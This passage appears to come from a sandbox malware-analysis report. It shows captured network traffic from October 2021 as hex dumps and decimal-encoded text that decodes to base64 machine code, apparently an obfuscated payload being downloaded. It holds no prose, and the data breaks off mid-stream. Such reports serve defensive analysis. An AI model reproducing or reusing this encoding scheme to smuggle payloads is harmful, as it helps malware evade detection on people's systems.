                    Data Ascii: 97 0 80 0 52 0 68 0 65 0 65 0 67 0 76 0 120 0 117 0 104 0 120 0 54 0 47 0 47 0 47 0 105 0 52 0 89 0 111 0 87 0 119 0 65 0 65 0 103 0 47 0 103 0 70 0 88 0 51 0 81 0 74 0 103 0 47 0 103 0 71 0 100 0 65 0 81 0 122 0 119 0 79 0 115 0 68 0 77 0 56 0 66 0 65 0
                    2021-10-26 16:59:18 UTC1128INData Raw: 30 20 31 31 31 20 30 20 36 37 20 30 20 31 31 39 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 31 32 32 20 30 20 38 34 20 30 20 37 31 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 31 31 39 20 30 20 34 33 20 30 20 31 30 34 20 30 20 31 31 38 20 30 20 35 34 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 39 37 20 30 20 36 36 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 31 35 20 30 20 34 39 20 30 20 36 36 20 30 20 31 30 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 36 20 30 20 31 30 35 20 30 20 35 36 20 30 20 38 30 20 30 20 31 31 31 20 30 20 38 38 20 30 20 37 39 20 30 20 31 30 36 20 30 20 34 37
                    Data Ascii: 0 111 0 67 0 119 0 81 0 65 0 65 0 73 0 50 0 122 0 84 0 71 0 77 0 65 0 65 0 70 0 87 0 76 0 119 0 43 0 104 0 118 0 54 0 80 0 47 0 47 0 97 0 66 0 69 0 69 0 65 0 65 0 67 0 78 0 115 0 49 0 66 0 106 0 65 0 65 0 66 0 86 0 105 0 56 0 80 0 111 0 88 0 79 0 106 0 47
                    2021-10-26 16:59:18 UTC1133INData Raw: 34 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 34 39 20 30 20 39 30 20 30 20 38 34 20 30 20 38 35 20 30 20 35 30 20 30 20 31 30 36 20 30 20 31 31 32 20 30 20 36 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 31 30 35 20 30 20 35 36 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 35 32 20 30 20 37 39 20 30 20 31 31 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 37 38 20 30 20 38 37 20 30 20 38 35 20 30 20 34 39 20 30 20 37 38 20 30 20 31 31 31 20 30 20 35 34 20 30 20 31 30 33 20 30 20 37 37 20 30 20 36 35 20 30 20 36 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33 20 30 20 31 31 38 20 30 20 37 32 20 30 20 35 34 20 30 20
                    Data Ascii: 4 0 118 0 47 0 47 0 85 0 49 0 90 0 84 0 85 0 50 0 106 0 112 0 65 0 119 0 65 0 65 0 47 0 51 0 88 0 56 0 105 0 56 0 102 0 111 0 52 0 79 0 114 0 47 0 47 0 49 0 78 0 87 0 85 0 49 0 78 0 111 0 54 0 103 0 77 0 65 0 65 0 80 0 57 0 49 0 47 0 73 0 118 0 72 0 54 0
                    2021-10-26 16:59:18 UTC1137INData Raw: 34 20 30 20 37 30 20 30 20 34 39 20 30 20 31 31 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 31 30 34 20 30 20 31 30 31 20 30 20 38 34 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 38 31 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 31 30 37 20 30 20 35 31 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 39 20 30 20 31 30 34 20 30 20 34 39 20 30 20 38 37 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 33 20 30 20 35 36 20 30 20 38 32 20 30 20 37 33 20 30 20 34 37 20 30 20 35 31 20 30 20 38 38 20 30 20 35 36 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 35 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36
                    Data Ascii: 4 0 70 0 49 0 115 0 65 0 65 0 67 0 78 0 104 0 101 0 84 0 118 0 47 0 47 0 57 0 81 0 106 0 89 0 88 0 107 0 51 0 47 0 47 0 47 0 85 0 80 0 57 0 49 0 47 0 79 0 104 0 49 0 87 0 81 0 65 0 65 0 103 0 56 0 82 0 73 0 47 0 51 0 88 0 56 0 47 0 120 0 85 0 85 0 119 0 6
                    2021-10-26 16:59:18 UTC1141INData Raw: 36 20 30 20 38 36 20 30 20 31 31 33 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 35 32 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 35 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 37 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 35 20 30 20 36 35 20 30 20 34 33 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 30 20 30 20 31 30 30 20 30 20 31 31 31 20 30 20 37 37 20 30 20 37 37 20 30 20 34 39 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 35 30 20 30 20 37 30 20 30 20 36 35 20 30 20 38 30 20 30 20 36 38 20 30 20 34 37 20 30
                    Data Ascii: 6 0 86 0 113 0 77 0 66 0 65 0 65 0 73 0 118 0 52 0 106 0 89 0 85 0 65 0 43 0 80 0 47 0 47 0 85 0 79 0 103 0 77 0 47 0 47 0 47 0 47 0 106 0 89 0 85 0 65 0 43 0 80 0 47 0 47 0 85 0 70 0 100 0 111 0 77 0 77 0 49 0 65 0 65 0 73 0 50 0 70 0 65 0 80 0 68 0 47 0
                    2021-10-26 16:59:18 UTC1145INData Raw: 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 37 30 20 30 20 38 32 20 30 20 38 35 20 30 20 34 39 20 30 20 39 30 20 30 20 38 38 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 38 20 30 20 38 31 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 31 32 32 20 30 20 38 37 20 30 20 38 39 20 30 20 31 31 39 20 30 20 38 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 37 20 30 20 35 37 20 30 20 31 31 36 20 30 20 38 34 20 30 20 38 35 20 30 20 35 32 20 30 20 31 31 38 20 30 20 35 32 20 30 20 39 37 20 30 20 36 39 20 30 20 38 39 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20
                    Data Ascii: 87 0 76 0 55 0 70 0 70 0 82 0 85 0 49 0 90 0 88 0 47 0 51 0 85 0 77 0 47 0 51 0 85 0 73 0 47 0 120 0 88 0 81 0 119 0 85 0 65 0 65 0 105 0 122 0 87 0 89 0 119 0 85 0 65 0 65 0 77 0 57 0 116 0 84 0 85 0 52 0 118 0 52 0 97 0 69 0 89 0 66 0 65 0 65 0 66 0 88
                    2021-10-26 16:59:18 UTC1149INData Raw: 20 38 36 20 30 20 37 38 20 30 20 34 39 20 30 20 36 36 20 30 20 35 32 20 30 20 31 31 35 20 30 20 37 31 20 30 20 35 34 20 30 20 31 30 32 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 38 20 30 20 39 38 20 30 20 38 32 20 30 20 38 31 20 30 20 31 30 35 20 30 20 37 38 20 30 20 38 32 20 30 20 34 37 20 30 20 34 33 20 30 20 37 34 20 30 20 38 32 20 30 20 36 37 20 30 20 38 31 20 30 20 37 33 20 30 20 38 35 20 30 20 31 30 30 20 30 20 31 31 32 20 30 20 34 39 20 30 20 36 38 20 30 20 37 30 20 30 20 37 32 20 30 20 31 30 30 20 30 20 38 38 20 30 20 36 37 20 30 20 38 31 20 30 20 31 30 33 20 30 20 35 30 20 30 20 34 38 20 30 20 38 31 20 30 20 31 30 37 20 30 20 36 39 20 30 20 37 38 20 30 20 34 39 20 30 20 39 39 20 30 20 37 34 20 30 20 36 36 20 30 20
                    Data Ascii: 86 0 78 0 49 0 66 0 52 0 115 0 71 0 54 0 102 0 103 0 65 0 65 0 65 0 68 0 98 0 82 0 81 0 105 0 78 0 82 0 47 0 43 0 74 0 82 0 67 0 81 0 73 0 85 0 100 0 112 0 49 0 68 0 70 0 72 0 100 0 88 0 67 0 81 0 103 0 50 0 48 0 81 0 107 0 69 0 78 0 49 0 99 0 74 0 66 0
                    2021-10-26 16:59:18 UTC1153INData Raw: 20 30 20 38 36 20 30 20 39 30 20 30 20 38 38 20 30 20 31 31 38 20 30 20 35 32 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 36 20 30 20 38 39 20 30 20 38 38 20 30 20 31 31 39 20 30 20 34 37 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 38 35 20 30 20 37 30 20 30 20 37 39 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 36 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 37 31 20 30 20 34 33 20 30 20 36 35 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 35 20 30 20 37 30 20 30 20 39 38 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 31 20 30 20 31 30 36 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 38 20 30 20 31 30 36 20 30 20 38 39 20
                    Data Ascii: 0 86 0 90 0 88 0 118 0 52 0 65 0 65 0 65 0 65 0 66 0 88 0 106 0 89 0 88 0 119 0 47 0 118 0 47 0 47 0 85 0 70 0 79 0 78 0 82 0 102 0 66 0 81 0 97 0 103 0 71 0 43 0 65 0 65 0 81 0 65 0 65 0 70 0 98 0 47 0 70 0 101 0 106 0 65 0 81 0 65 0 66 0 88 0 106 0 89
                    2021-10-26 16:59:18 UTC1157INData Raw: 35 34 20 30 20 31 31 36 20 30 20 31 30 39 20 30 20 31 31 33 20 30 20 35 32 20 30 20 31 31 36 20 30 20 37 30 20 30 20 36 37 20 30 20 36 35 20 30 20 34 33 20 30 20 35 30 20 30 20 36 36 20 30 20 36 35 20 30 20 37 38 20 30 20 38 31 20 30 20 39 37 20 30 20 37 32 20 30 20 31 32 32 20 30 20 37 38 20 30 20 38 31 20 30 20 36 35 20 30 20 36 37 20 30 20 37 38 20 30 20 38 32 20 30 20 31 30 31 20 30 20 31 30 34 20 30 20 31 31 33 20 30 20 36 37 20 30 20 31 30 38 20 30 20 36 38 20 30 20 31 31 31 20 30 20 39 39 20 30 20 35 30 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 37 31 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 31 31 31 20 30 20 38 35 20 30 20 38 30 20 30 20 35 37 20 30 20 34 39 20 30 20 34 37 20 30 20 37 33
                    Data Ascii: 54 0 116 0 109 0 113 0 52 0 116 0 70 0 67 0 65 0 43 0 50 0 66 0 65 0 78 0 81 0 97 0 72 0 122 0 78 0 81 0 65 0 67 0 78 0 82 0 101 0 104 0 113 0 67 0 108 0 68 0 111 0 99 0 50 0 65 0 65 0 65 0 71 0 111 0 71 0 106 0 85 0 88 0 111 0 85 0 80 0 57 0 49 0 47 0 73
                    2021-10-26 16:59:18 UTC1160INData Raw: 31 30 31 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 30 20 30 20 31 30 38 20 30 20 39 30 20 30 20 31 30 30 20 30 20 38 31 20 30 20 37 38 20 30 20 37 32 20 30 20 35 34 20 30 20 34 33 20 30 20 37 35 20 30 20 37 36 20 30 20 36 36 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 37 38 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 38 20 30 20 35 31 20 30 20 37 35 20 30 20 34 37 20 30 20 36 36 20 30 20 37 34 20 30 20 37 39 20 30 20 34 37 20 30 20 37 30 20 30 20 34 33 20 30 20 36 35 20 30 20 31 31 31 20 30 20 31 31 38 20 30 20 31 32 30 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34 33 20 30 20 38 33 20 30 20 36 38 20 30 20 38 30 20 30 20 37 34 20 30 20 31 30 34 20 30 20 31 30 32 20 30 20 39 30 20 30 20 34
                    Data Ascii: 101 0 65 0 65 0 67 0 70 0 119 0 70 0 108 0 90 0 100 0 81 0 78 0 72 0 54 0 43 0 75 0 76 0 66 0 111 0 116 0 78 0 68 0 73 0 118 0 51 0 75 0 47 0 66 0 74 0 79 0 47 0 70 0 43 0 65 0 111 0 118 0 120 0 104 0 102 0 90 0 43 0 83 0 68 0 80 0 74 0 104 0 102 0 90 0 4
                    2021-10-26 16:59:18 UTC1165INData Raw: 39 39 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 37 34 20 30 20 31 30 32 20 30 20 36 36 20 30 20 37 33 20 30 20 35 35 20 30 20 38 33 20 30 20 36 36 20 30 20 31 32 30 20 30 20 35 37 20 30 20 36 38 20 30 20 38 39 20 30 20 31 31 36 20 30 20 38 31 20 30 20 36 38 20 30 20 37 33 20 30 20 31 31 35 20 30 20 37 37 20 30 20 31 30 35 20 30 20 31 31 31 20 30 20 31 31 36 20 30 20 36 35 20 30 20 36 39 20 30 20 37 33 20 30 20 34 38 20 30 20 36 39 20 30 20 38 33 20 30 20 37 37 20 30 20 37 37 20 30 20 31 32 32 20 30 20 31 31 39 20 30 20 37 37 20 30 20 37 39 20 30 20 36 38 20 30 20 34 33 20 30 20 31 31 38 20 30 20 34 33 20 30 20 37 36 20 30 20 38 33 20 30 20 36 35 20 30 20 31 32 30 20 30 20 38 37 20 30 20 38 36 20 30 20 35 32 20 30
                    Data Ascii: 99 0 73 0 69 0 65 0 73 0 88 0 74 0 102 0 66 0 73 0 55 0 83 0 66 0 120 0 57 0 68 0 89 0 116 0 81 0 68 0 73 0 115 0 77 0 105 0 111 0 116 0 65 0 69 0 73 0 48 0 69 0 83 0 77 0 77 0 122 0 119 0 77 0 79 0 68 0 43 0 118 0 43 0 76 0 83 0 65 0 120 0 87 0 86 0 52 0
                    2021-10-26 16:59:18 UTC1169INData Raw: 30 20 34 39 20 30 20 37 30 20 30 20 34 38 20 30 20 37 39 20 30 20 31 30 35 20 30 20 35 33 20 30 20 34 37 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 34 38 20 30 20 38 38 20 30 20 31 30 33 20 30 20 39 30 20 30 20 31 31 31 20 30 20 31 30 37 20 30 20 34 38 20 30 20 31 30 31 20 30 20 37 33 20 30 20 31 31 36 20 30 20 34 39 20 30 20 36 38 20 30 20 36 39 20 30 20 31 30 31 20 30 20 37 34 20 30 20 31 30 32 20 30 20 31 30 32 20 30 20 31 30 35 20 30 20 37 34 20 30 20 38 38 20 30 20 31 30 31 20 30 20 31 32 32 20 30 20 34 37 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 32 20 30 20 36 37 20 30 20 37 38 20 30 20 36 36 20 30 20 36 39 20 30 20 39 30 20 30 20 31 30 39 20 30 20 37 39 20 30 20 38
                    Data Ascii: 0 49 0 70 0 48 0 79 0 105 0 53 0 47 0 102 0 47 0 47 0 105 0 48 0 88 0 103 0 90 0 111 0 107 0 48 0 101 0 73 0 116 0 49 0 68 0 69 0 101 0 74 0 102 0 102 0 105 0 74 0 88 0 101 0 122 0 47 0 82 0 102 0 67 0 76 0 82 0 102 0 67 0 78 0 66 0 69 0 90 0 109 0 79 0 8
                    2021-10-26 16:59:18 UTC1173INData Raw: 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 34 37 20 30 20 31 32 30 20 30 20 38 37 20 30 20 31 31 39 20 30 20 31 31 39 20 30 20 36 39 20 30 20 36 35 20 30 20 36 35 20 30 20 31 30 35 20 30 20 34 37 20 30 20 31 30 35 20 30 20 37 30 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 31 32 20 30 20 37 33 20 30 20 38 36 20 30 20 35 31 20 30 20 34 38 20 30 20 31 30 36 20 30 20 38 35 20 30 20 38 38 20 30 20 34 38 20 30 20 38 35 20 30 20 37 31 20 30 20 31 31 31 20 30 20 36 37 20 30 20 38 36 20 30 20 34 37 20 30 20 35 36 20 30 20 38 36 20 30 20 36 35 20 30 20 37 37 20 30 20 36 36 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 38 38 20 30 20 36 35 20 30 20 31 30 30 20 30 20 36 35 20 30 20 31 31 34 20 30 20 34 37 20 30 20 31 30 30 20 30
                    Data Ascii: 65 0 65 0 65 0 67 0 47 0 120 0 87 0 119 0 119 0 69 0 65 0 65 0 105 0 47 0 105 0 70 0 47 0 51 0 81 0 112 0 73 0 86 0 51 0 48 0 106 0 85 0 88 0 48 0 85 0 71 0 111 0 67 0 86 0 47 0 56 0 86 0 65 0 77 0 66 0 65 0 65 0 73 0 88 0 65 0 100 0 65 0 114 0 47 0 100 0
                    2021-10-26 16:59:18 UTC1177INData Raw: 30 35 20 30 20 31 31 39 20 30 20 34 39 20 30 20 31 31 31 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 37 39 20 30 20 31 31 39 20 30 20 34 39 20 30 20 34 38 20 30 20 31 32 30 20 30 20 36 39 20 30 20 36 39 20 30 20 36 35 20 30 20 31 30 32 20 30 20 38 36 20 30 20 31 30 31 20 30 20 37 36 20 30 20 36 38 20 30 20 38 36 20 30 20 31 30 36 20 30 20 36 39 20 30 20 38 31 20 30 20 38 31 20 30 20 36 37 20 30 20 37 38 20 30 20 38 30 20 30 20 36 39 20 30 20 37 31 20 30 20 37 38 20 30 20 38 32 20 30 20 36 38 20 30 20 38 39 20 30 20 36 37 20 30 20 38 35 20 30 20 38 30 20 30 20 35 36 20 30 20 34 39 20 30 20 38 38 20 30 20 37 37 20 30 20 38 32 20 30 20 36 36 20 30 20 36 35 20 30 20 37 30 20 30 20 31 30 32 20 30 20 31 31 31 20 30 20 31 31 39 20 30
                    Data Ascii: 05 0 119 0 49 0 111 0 120 0 69 0 69 0 65 0 79 0 119 0 49 0 48 0 120 0 69 0 69 0 65 0 102 0 86 0 101 0 76 0 68 0 86 0 106 0 69 0 81 0 81 0 67 0 78 0 80 0 69 0 71 0 78 0 82 0 68 0 89 0 67 0 85 0 80 0 56 0 49 0 88 0 77 0 82 0 66 0 65 0 70 0 102 0 111 0 119 0
                    2021-10-26 16:59:18 UTC1181INData Raw: 20 30 20 34 38 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 38 37 20 30 20 38 36 20 30 20 31 31 30 20 30 20 36 38 20 30 20 38 36 20 30 20 38 39 20 30 20 31 31 38 20 30 20 31 31 35 20 30 20 31 30 33 20 30 20 34 33 20 30 20 31 32 30 20 30 20 36 35 20 30 20 39 30 20 30 20 31 31 31 20 30 20 37 38 20 30 20 31 30 38 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 36 20 30 20 31 31 33 20 30 20 38 30 20 30 20 31 31 31 20 30 20 34 39 20 30 20 37 30 20 30 20 31 31 39 20 30 20 31 30 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 38 35 20 30 20 37 39 20 30 20 31 30 33 20 30 20 39 38 20 30 20 38 35 20 30 20 31 31 39 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 31 30 33 20 30 20 31 31 33 20 30 20 37 38 20 30 20 38 32 20 30 20 39 39 20 30
                    Data Ascii: 0 48 0 85 0 119 0 65 0 65 0 87 0 86 0 110 0 68 0 86 0 89 0 118 0 115 0 103 0 43 0 120 0 65 0 90 0 111 0 78 0 108 0 119 0 65 0 66 0 113 0 80 0 111 0 49 0 70 0 119 0 109 0 111 0 65 0 85 0 79 0 103 0 98 0 85 0 119 0 65 0 65 0 97 0 103 0 113 0 78 0 82 0 99 0
                    2021-10-26 16:59:18 UTC1185INData Raw: 34 37 20 30 20 31 30 30 20 30 20 38 31 20 30 20 31 30 36 20 30 20 31 31 31 20 30 20 37 33 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 32 20 30 20 38 30 20 30 20 36 39 20 30 20 36 38 20 30 20 36 39 20 30 20 39 39 20 30 20 35 35 20 30 20 34 33 20 30 20 31 31 39 20 30 20 34 33 20 30 20 37 37 20 30 20 38 31 20 30 20 38 30 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 35 37 20 30 20 31 30 31 20 30 20 38 37 20 30 20 35 32 20 30 20 31 31 38 20 30 20 31 30 38 20 30 20 38 38 20 30 20 39 39 20 30 20 37 38 20 30 20 38 36 20 30 20 31 30 35 20 30 20 34 33 20 30 20 31 32 31 20 30 20 35 32 20 30 20 36 36 20 30 20 36 37 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 39 20 30 20 31 30 36 20 30 20 34 38 20 30
                    Data Ascii: 47 0 100 0 81 0 106 0 111 0 73 0 118 0 47 0 47 0 47 0 52 0 80 0 69 0 68 0 69 0 99 0 55 0 43 0 119 0 43 0 77 0 81 0 80 0 47 0 47 0 47 0 49 0 57 0 101 0 87 0 52 0 118 0 108 0 88 0 99 0 78 0 86 0 105 0 43 0 121 0 52 0 66 0 67 0 73 0 65 0 65 0 79 0 106 0 48 0
                    2021-10-26 16:59:18 UTC1189INData Raw: 20 30 20 35 33 20 30 20 31 30 31 20 30 20 31 32 31 20 30 20 39 39 20 30 20 38 30 20 30 20 34 37 20 30 20 31 30 30 20 30 20 36 37 20 30 20 38 31 20 30 20 36 39 20 30 20 35 34 20 30 20 36 35 20 30 20 31 31 30 20 30 20 31 31 30 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 37 30 20 30 20 31 31 39 20 30 20 37 30 20 30 20 31 30 38 20 30 20 34 38 20 30 20 31 30 31 20 30 20 38 36 20 30 20 39 30 20 30 20 38 38 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 30 37 20 30 20 36 38 20 30 20 37 36 20 30 20 34 33 20 30 20 38 31 20 30 20 34 33 20 30 20 34 38 20 30 20 36 35 20 30 20 36 35 20 30 20 38 36 20 30 20 34 33 20 30 20 31 30 35 20 30 20 38 38 20 30 20 38 34 20 30 20 31 30 33 20 30 20 36 35 20 30 20 36 35 20 30 20 39 37 20 30 20 38 30 20 30 20 38
                    Data Ascii: 0 53 0 101 0 121 0 99 0 80 0 47 0 100 0 67 0 81 0 69 0 54 0 65 0 110 0 110 0 47 0 47 0 43 0 70 0 119 0 70 0 108 0 48 0 101 0 86 0 90 0 88 0 47 0 51 0 81 0 107 0 68 0 76 0 43 0 81 0 43 0 48 0 65 0 65 0 86 0 43 0 105 0 88 0 84 0 103 0 65 0 65 0 97 0 80 0 8
                    2021-10-26 16:59:18 UTC1193INData Raw: 20 30 20 39 30 20 30 20 38 31 20 30 20 39 37 20 30 20 31 30 33 20 30 20 36 38 20 30 20 34 37 20 30 20 37 30 20 30 20 31 30 30 20 30 20 31 32 32 20 30 20 36 35 20 30 20 38 31 20 30 20 36 35 20 30 20 36 36 20 30 20 38 31 20 30 20 35 34 20 30 20 37 30 20 30 20 31 32 32 20 30 20 34 33 20 30 20 34 37 20 30 20 34 37 20 30 20 35 37 20 30 20 39 30 20 30 20 38 37 20 30 20 38 36 20 30 20 35 35 20 30 20 37 34 20 30 20 31 31 39 20 30 20 34 39 20 30 20 37 39 20 30 20 37 36 20 30 20 35 30 20 30 20 38 39 20 30 20 38 38 20 30 20 39 38 20 30 20 31 30 30 20 30 20 38 31 20 30 20 37 38 20 30 20 31 31 33 20 30 20 39 30 20 30 20 37 30 20 30 20 31 31 36 20 30 20 31 31 33 20 30 20 36 36 20 30 20 38 39 20 30 20 31 30 38 20 30 20 37 31 20 30 20 36 37 20 30 20 37 30 20 30 20 31 30
                    Data Ascii: 0 90 0 81 0 97 0 103 0 68 0 47 0 70 0 100 0 122 0 65 0 81 0 65 0 66 0 81 0 54 0 70 0 122 0 43 0 47 0 47 0 57 0 90 0 87 0 86 0 55 0 74 0 119 0 49 0 79 0 76 0 50 0 89 0 88 0 98 0 100 0 81 0 78 0 113 0 90 0 70 0 116 0 113 0 66 0 89 0 108 0 71 0 67 0 70 0 10
                    2021-10-26 16:59:18 UTC1197INData Raw: 20 36 35 20 30 20 36 38 20 30 20 31 31 31 20 30 20 31 30 39 20 30 20 31 31 35 20 30 20 31 31 38 20 30 20 34 37 20 30 20 34 37 20 30 20 34 39 20 30 20 31 31 30 20 30 20 36 38 20 30 20 34 37 20 30 20 35 31 20 30 20 38 31 20 30 20 31 30 37 20 30 20 36 37 20 30 20 38 30 20 30 20 35 37 20 30 20 34 38 20 30 20 37 34 20 30 20 36 35 20 30 20 31 30 36 20 30 20 34 37 20 30 20 31 31 35 20 30 20 37 35 20 30 20 36 35 20 30 20 36 37 20 30 20 36 35 20 30 20 36 35 20 30 20 36 37 20 30 20 37 36 20 30 20 38 32 20 30 20 36 37 20 30 20 38 31 20 30 20 38 39 20 30 20 35 34 20 30 20 37 30 20 30 20 39 38 20 30 20 37 34 20 30 20 34 37 20 30 20 34 37 20 30 20 34 33 20 30 20 36 38 20 30 20 31 32 30 20 30 20 36 35 20 30 20 31 32 32 20 30 20 36 37 20 30 20 36 38 20 30 20 36 35 20 30
                    Data Ascii: 65 0 68 0 111 0 109 0 115 0 118 0 47 0 47 0 49 0 110 0 68 0 47 0 51 0 81 0 107 0 67 0 80 0 57 0 48 0 74 0 65 0 106 0 47 0 115 0 75 0 65 0 67 0 65 0 65 0 67 0 76 0 82 0 67 0 81 0 89 0 54 0 70 0 98 0 74 0 47 0 47 0 43 0 68 0 120 0 65 0 122 0 67 0 68 0 65 0
                    2021-10-26 16:59:18 UTC1202INData Raw: 20 30 20 34 37 20 30 20 35 37 20 30 20 34 39 20 30 20 36 39 20 30 20 37 33 20 30 20 31 31 35 20 30 20 36 36 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 33 20 30 20 34 37 20 30 20 34 39 20 30 20 36 35 20 30 20 36 39 20 30 20 38 38 20 30 20 39 39 20 30 20 37 33 20 30 20 37 37 20 30 20 36 35 20 30 20 37 30 20 30 20 38 37 20 30 20 37 36 20 30 20 35 35 20 30 20 37 30 20 30 20 37 38 20 30 20 38 37 20 30 20 31 30 35 20 30 20 35 31 20 30 20 38 35 20 30 20 38 31 20 30 20 38 36 20 30 20 34 37 20 30 20 35 37 20 30 20 34 39 20 30 20 36 37 20 30 20 37 39 20 30 20 31 30 35 20 30 20 37 37 20 30 20 34 33 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 34 37 20 30 20 35 31 20 30 20 38 35 20 30 20 37 37 20 30 20 31 30 35 20 30 20 35 37 20 30 20 31 30 36
                    Data Ascii: 0 47 0 57 0 49 0 69 0 73 0 115 0 66 0 47 0 51 0 85 0 73 0 47 0 49 0 65 0 69 0 88 0 99 0 73 0 77 0 65 0 70 0 87 0 76 0 55 0 70 0 78 0 87 0 105 0 51 0 85 0 81 0 86 0 47 0 57 0 49 0 67 0 79 0 105 0 77 0 43 0 47 0 47 0 47 0 47 0 51 0 85 0 77 0 105 0 57 0 106
                    2021-10-26 16:59:18 UTC1206INData Raw: 30 20 37 34 20 30 20 34 33 20 30 20 31 30 32 20 30 20 34 37 20 30 20 34 37 20 30 20 31 30 35 20 30 20 34 38 20 30 20 34 38 20 30 20 37 33 20 30 20 31 30 35 20 30 20 38 31 20 30 20 37 31 20 30 20 37 36 20 30 20 38 32 20 30 20 31 30 32 20 30 20 31 30 34 20 30 20 31 30 31 20 30 20 31 32 31 20 30 20 39 39 20 30 20 37 33 20 30 20 36 39 20 30 20 36 35 20 30 20 37 33 20 30 20 37 39 20 30 20 35 32 20 30 20 35 33 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 36 35 20 30 20 36 36 20 30 20 38 34 20 30 20 38 36 20 30 20 34 37 20 30 20 34 33 20 30 20 31 31 39 20 30 20 31 31 31 20 30 20 36 35 20 30 20 37 33 20 30 20 36 35 20 30 20 36 35 20 30 20 37 33 20 30 20 31 31 38 20 30 20 35 33 20 30 20 31 30 35 20 30 20 35 37 20 30 20 31 31 32 20 30 20 34
